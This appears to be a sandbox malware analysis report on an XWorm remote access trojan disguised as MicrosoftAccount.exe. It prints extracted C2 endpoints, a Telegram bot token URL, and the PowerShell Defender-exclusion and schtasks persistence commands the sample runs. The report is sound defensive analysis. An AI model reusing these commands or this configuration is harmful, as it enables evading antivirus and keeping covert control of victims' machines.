Overview

overview

10

Static

static

10

MicrosoftAccount.exe

windows7-x64

10

MicrosoftAccount.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    297s
  • max time network
    291s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/01/2025, 06:46 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    MicrosoftAccount.exe

  • Size

    69KB

  • MD5

    60efdd9e1cf39dd0a3a7fbdeb6a2d391

  • SHA1

    29dbc62cedd344c115047fcec30f83e81c6d794c

  • SHA256

    5ad2e8363c51cc2392e5ea5c34fd426d585c118a1010cd034ccca53cb9aea8b0

  • SHA512

    c070114f7bbc384b5362111a70f1a910ecbf08b909d9e7b4222c904c221a107494e38840f5bc443faee8822281c5d46d65c7970003b7b625e7d1488ce6d58b84

  • SSDEEP

    1536:fl/VpCz5Iqc+28akCkj42kbOOhW8DS6qfRtFAO5ZPYC:fldN8ak9kbbI8ot2O5ZPx

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:7703

147.185.221.25:7703

regarding-states.gl.at.ply.gg:7703
Attributes
  • Install_directory

    %AppData%

  • install_file

    ApplicationFrameHost.exe

  • telegram

    https://api.telegram.org/bot6353034618:AAHzEkRGIc7NNoV5QuVXoAVVOMmU4ikzPYc/sendMessage?chat_id=1735841155

Signatures

  • Detect Xworm Payload 6 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\MicrosoftAccount.exe
    "C:\Users\Admin\AppData\Local\Temp\MicrosoftAccount.exe"
    1⤵
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MicrosoftAccount.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2656
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftAccount.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ApplicationFrameHost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1136
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ApplicationFrameHost" /tr "C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:1920
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {DB69A6EE-46A9-4E2F-96D1-69FCC20E178F} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3052
    • C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1736
    • C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2200
    • C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:316
    • C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2840
    • C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2524

Network

  • flag-us
    DNS
    api.telegram.org
    MicrosoftAccount.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • 149.154.167.220:443
    api.telegram.org
    tls
    MicrosoftAccount.exe
    388 B
     219 B
     5
    5
  • 147.185.221.25:7703
    MicrosoftAccount.exe
    4.1kB
     2.8kB
     56
    56
  • 8.8.8.8:53
    api.telegram.org
    dns
    MicrosoftAccount.exe
    62 B
     78 B
     1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\ApplicationFrameHost.exe
    Filesize

    69KB

    MD5

    60efdd9e1cf39dd0a3a7fbdeb6a2d391

    SHA1

    29dbc62cedd344c115047fcec30f83e81c6d794c

    SHA256

    5ad2e8363c51cc2392e5ea5c34fd426d585c118a1010cd034ccca53cb9aea8b0

    SHA512

    c070114f7bbc384b5362111a70f1a910ecbf08b909d9e7b4222c904c221a107494e38840f5bc443faee8822281c5d46d65c7970003b7b625e7d1488ce6d58b84

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    d0665370034095695fb7f3c6745fa4ec

    SHA1

    98fbd68a233a31620b9660f19b1358d2e3b1d9ad

    SHA256

    e62986ea8323bf705a2a62fdd8fc2d0ec7ddd9d4cc4311bbb4568c5f6a22a766

    SHA512

    daa01ee15907193bec071d435bcc2024dc8f22a08d2f3886f10f36c14bbd97dbb2a0054c737bcadf4999f6ce3acb140d5434b6e8d267e5934bee33b8ea8d2c19

    Download Submit

  • memory/316-42-0x0000000001060000-0x0000000001078000-memory.dmp

    Filesize

    96KB

    Download

  • memory/1680-14-0x000000001B600000-0x000000001B8E2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1680-15-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1736-37-0x0000000000150000-0x0000000000168000-memory.dmp

    Filesize

    96KB

    Download

  • memory/2200-40-0x00000000008D0000-0x00000000008E8000-memory.dmp

    Filesize

    96KB

    Download

  • memory/2656-8-0x0000000001CE0000-0x0000000001CE8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2656-6-0x0000000002C80000-0x0000000002D00000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2656-7-0x000000001B750000-0x000000001BA32000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2764-31-0x000000001B0D0000-0x000000001B150000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2764-1-0x0000000000990000-0x00000000009A8000-memory.dmp

    Filesize

    96KB

    Download

  • memory/2764-33-0x000000001B0D0000-0x000000001B150000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2764-32-0x000007FEF5FF3000-0x000007FEF5FF4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2764-0-0x000007FEF5FF3000-0x000007FEF5FF4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2840-44-0x0000000001390000-0x00000000013A8000-memory.dmp

    Filesize

    96KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.